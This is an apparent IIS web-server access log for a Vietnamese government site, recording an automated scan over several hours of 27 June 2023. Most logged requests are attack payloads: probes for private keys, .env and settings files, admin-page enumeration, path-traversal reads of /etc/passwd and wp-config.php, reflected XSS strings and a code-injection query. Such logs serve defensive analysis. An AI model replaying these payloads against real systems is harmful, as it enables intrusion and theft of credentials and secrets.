/ssl/bcvt.kontum.gov.vn_key.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 31 2023-06-27 18:15:09 103.153.214.94 GET /cert/bcvt.kontum.gov.vn_key.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 36 2023-06-27 18:15:13 103.153.214.94 GET /cert/kontum.gov.vn_key.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 42 2023-06-27 18:15:16 103.153.214.94 GET /cert/bcvt.kontum.gov.vn.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 31 2023-06-27 18:15:20 103.153.214.94 GET /ssl/private/bcvt.kontum.gov.vn_key.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 35 2023-06-27 18:15:23 103.153.214.94 GET /certs/bcvt.kontum.gov.vn_private.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 43 2023-06-27 18:15:26 103.153.214.94 GET /certs/bcvt.kontum.gov.vn.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 37 2023-06-27 18:15:29 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn_priv.pem - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 28 2023-06-27 18:15:32 103.153.214.94 GET /certificates/bcvt.kontum.gov.vn_privkey.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 28 2023-06-27 18:15:35 103.153.214.94 GET /certs/bcvt.kontum.gov.vn.pem - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 25 2023-06-27 18:15:37 103.153.214.94 GET /private/bcvt.kontum.gov.vn.key - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 32 2023-06-27 18:15:39 103.153.214.94 GET /keys/bcvt.kontum.gov.vn.pem - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 31 2023-06-27 18:20:19 103.153.214.94 GET /wt3/forceSave.php file=/etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 53 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 18:37:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 18:37:09 103.153.214.94 GET /wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script> - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 41 2023-06-27 18:50:01 103.153.214.94 POST /v2/api/product/manger/getInfo - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 35 2023-06-27 18:56:59 103.153.214.94 GET /login/ - 443 - 84.46.251.165 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US)+AppleWebKit/527++(KHTML,+like+Gecko,+Safari/419.3)+Arora/0.6+(Change:+) - 200 0 0 206 2023-06-27 18:56:59 103.153.214.94 GET /usuarios/login.php - 443 - 84.46.251.165 Mozilla/5.0+(X11;+NetBSD+amd64;+rv:16.0)+Gecko/20121102+Firefox/16.0 - 200 0 0 217 2023-06-27 18:56:59 103.153.214.94 GET /webadmin/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+U;+Android+1.6;+es-es;+SonyEricssonX10i+Build/R1FA016)+AppleWebKit/528.5++(KHTML,+like+Gecko)+Version/3.1.2+Mobile+Safari/525.20.1 - 200 0 0 215 2023-06-27 18:56:59 103.153.214.94 GET /authenticate.php - 443 - 84.46.251.165 Mozilla/4.0+(PSP+(PlayStation+Portable);+2.00) - 200 0 0 199 2023-06-27 18:56:59 103.153.214.94 GET /session.php - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+11;+RMX2161)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.85+Mobile+Safari/537.36 - 200 0 0 199 2023-06-27 18:57:00 103.153.214.94 GET /usuarios/ - 443 - 84.46.251.165 Mozilla/5.0+(compatible;+Konqueror/3.3;+Linux+2.6.8-gentoo-r3;+X11; - 200 0 0 201 2023-06-27 18:57:00 103.153.214.94 GET /panel/ - 443 - 84.46.251.165 Screaming+Frog+SEO+Spider/8.1 - 200 0 0 215 2023-06-27 18:57:00 103.153.214.94 GET /admin/ - 443 - 84.46.251.165 Mozilla/5.0+(X11;+Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 221 2023-06-27 18:57:00 103.153.214.94 GET /acceso.php - 443 - 84.46.251.165 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_5)+AppleWebKit/537.78.1+(KHTML+like+Gecko)+Version/7.0.6+Safari/537.78.1 - 200 0 0 221 2023-06-27 18:57:00 103.153.214.94 GET /paneladmin/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+6.0;+ALE-L21+Build/HuaweiALE-L21)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/50.0.2661.89+Mobile+Safari/537.36 - 200 0 0 222 2023-06-27 18:57:00 103.153.214.94 GET /user/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+U;+Android+10;+zh-Hans-CN;+YAL-AL50+Build/HUAWEIYAL-AL50)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/78.0.3904.108+Quark/5.6.6.211+Mobile+Safari/537.36 - 200 0 0 216 2023-06-27 18:57:00 103.153.214.94 GET /pages/admin/ - 443 - 84.46.251.165 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.88+Safari/537.36 - 200 0 0 210 2023-06-27 18:57:00 103.153.214.94 GET /account.php - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+11;+SM-A505F)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.61+Mobile+Safari/537.36 - 200 0 0 212 2023-06-27 18:57:00 103.153.214.94 GET /panel-administracion/login.php - 443 - 84.46.251.165 Opera/8.01+(J2ME/MIDP;+Opera+Mini/1.0.1479/HiFi;+SonyEricsson+P900;+no;+U;+ssr) - 200 0 0 221 2023-06-27 18:57:00 103.153.214.94 GET /user.php - 443 - 84.46.251.165 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+15_2_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E148+Safari+Line/12.6.0 - 200 0 0 210 2023-06-27 18:57:00 103.153.214.94 GET /cp.php - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+11;+Pixel+2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.61+Mobile+Safari/537.36 - 200 0 0 213 2023-06-27 18:57:00 103.153.214.94 GET /usuario/ - 443 - 84.46.251.165 Mozilla/5.0+(X11;+Linux+i686;+rv:20.0)+Gecko/20100101+Firefox/20.0 - 200 0 0 660 2023-06-27 18:57:00 103.153.214.94 GET /panel-administracion/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+8.0.0;+SM-G930F)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Mobile+Safari/537.36 - 200 0 0 215 2023-06-27 18:57:00 103.153.214.94 GET /siteadmin/ - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+12;+ASUS_I005DA)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Mobile+Safari/537.36+EdgA/100.0.1185.50 - 200 0 0 215 2023-06-27 18:57:00 103.153.214.94 GET /adm.php - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+10;+SM-J810G)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.104+Mobile+Safari/537.36 - 200 0 0 213 2023-06-27 18:57:00 103.153.214.94 GET /webadmin.php - 443 - 84.46.251.165 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.54+Safari/537.36 - 200 0 0 679 2023-06-27 18:57:00 103.153.214.94 GET /adm/ - 443 - 84.46.251.165 Roku/DVP-4.1+(024.01E01250A) - 200 0 0 220 2023-06-27 18:57:02 103.153.214.94 GET /siteadmin/login.php - 443 - 84.46.251.165 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - 200 0 0 204 2023-06-27 19:00:09 103.153.214.94 POST /op/op.Login.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 78 2023-06-27 19:09:51 103.153.214.94 GET /hue/accounts/login next=/ 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 41 2023-06-27 19:11:46 103.153.214.94 GET /.env - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 36 2023-06-27 19:18:21 103.153.214.94 PUT /meta - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 33 2023-06-27 19:28:47 103.153.214.94 GET /agc/vicidial_mysqli_errors.txt - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 32 2023-06-27 19:31:34 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 33 2023-06-27 19:40:45 103.153.214.94 GET /servlet/taskProc srcURL=https://google.com&taskContentType=xml&taskEnv=xml&taskId=shortURL 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 28 2023-06-27 19:40:45 103.153.214.94 GET /MicroStrategy/servlet/taskProc srcURL=https://google.com&taskContentType=xml&taskEnv=xml&taskId=shortURL 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 27 2023-06-27 19:43:23 103.153.214.94 POST /graphql - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 53 2023-06-27 19:56:15 103.153.214.94 GET /HelpTheHelpDesk.jsdbx - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 31 2023-06-27 19:58:40 103.153.214.94 GET /module/api.php mobile/webNasIPS 443 - 45.117.82.231 TNAS - 200 0 0 33 2023-06-27 20:13:43 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 30 2023-06-27 20:15:01 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_drawroot 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 38 2023-06-27 20:16:57 103.153.214.94 GET /pages/setup.php defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 52 2023-06-27 20:20:17 103.153.214.94 GET /index.php/component/jemessenger/box_details dw_file=../../.././../../../etc/passwd&task=download 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 84 2023-06-27 20:21:51 103.153.214.94 GET /include/thumb.php dir=http\..\admin\login\login_check.php 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 34 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 20:42:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 20:42:09 103.153.214.94 GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php file=/wp-content/uploads/../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 43 2023-06-27 20:55:53 103.153.214.94 POST /VisionHubWebApi/api/Login - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 32 2023-06-27 21:04:05 103.153.214.94 GET /wp-content/themes/mTheme-Unus/css/css.php files=../../../../wp-config.php 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 35 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 21:22:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 21:22:39 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_matamko 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 37 2023-06-27 21:24:37 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_market 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 34 2023-06-27 21:30:07 103.153.214.94 GET /fmangersub cpath=../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 74 2023-06-27 21:31:09 103.153.214.94 GET /ajax-api/2.0/preview/mlflow/experiments/get experiment_id=0 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 71 2023-06-27 21:31:21 103.153.214.94 GET /main/calendar/agenda_list.php type=xss"+onmouseover=alert(document.domain)+" 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 52 2023-06-27 21:37:25 103.153.214.94 GET /wp-includes/sym404/root/etc/passwd - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 37 2023-06-27 21:45:31 103.153.214.94 GET /setup.cgi todo=debug&x=currentsetting.htm 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 32 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 22:02:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 22:02:45 103.153.214.94 GET /manager/controllers/default/resource/tvs.php class_key=../../../../../../../../../../windows/win.ini%00 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 41 2023-06-27 22:09:25 103.153.214.94 GET /ccmadmin/bulkvivewfilecontents.do fileName=../../../../../../../../../../../../../../../../etc/passwd&filetype=samplefile 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 41 2023-06-27 22:13:15 103.153.214.94 GET /7/0/33/1d/www.citysearch.com/search what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 34 2023-06-27 22:13:55 103.153.214.94 GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS /.. 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 28 2023-06-27 22:19:35 103.153.214.94 GET /wizard.htm - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 36 2023-06-27 22:32:47 103.153.214.94 GET /glpi/plugins/barcode/front/send.php file=../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 43 2023-06-27 22:42:03 103.153.214.94 POST /login/userverify.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 32 2023-06-27 22:57:23 103.153.214.94 POST /v1/query - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 36 2023-06-27 23:08:19 103.153.214.94 GET /index.php module=Install&view=Index 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 40 2023-06-27 23:09:35 103.153.214.94 POST /getcfg.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 34 2023-06-27 23:15:31 103.153.214.94 GET /settings.py - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 30 2023-06-27 23:15:31 103.153.214.94 GET /app/settings.py - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 25 2023-06-27 23:15:32 103.153.214.94 GET /django/settings.py - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 26 2023-06-27 23:15:32 103.153.214.94 GET /settings/settings.py - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 23 2023-06-27 23:15:33 103.153.214.94 GET /web/settings/settings.py - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 27 2023-06-27 23:24:19 103.153.214.94 GET /audit/gui_detail_view.php id=%5C&login=admin&token=1&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 47 2023-06-27 23:32:31 103.153.214.94 POST /boafrm/formSysCmd - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 32 2023-06-27 23:39:35 103.153.214.94 GET /config.json - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 33 2023-06-27 23:45:53 103.153.214.94 GET /email/unsubscribed email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 37 2023-06-27 23:47:33 103.153.214.94 POST /index.php controller=editlieux&option=com_gmapfp&task=upload_image&tmpl=component 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 33 2023-06-27 23:47:35 103.153.214.94 POST /index.php controller=editlieux&option=comgmapfp&task=upload_image&tmpl=component 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 26 2023-06-27 23:49:35 103.153.214.94 GET / score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&subreddit=news 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 37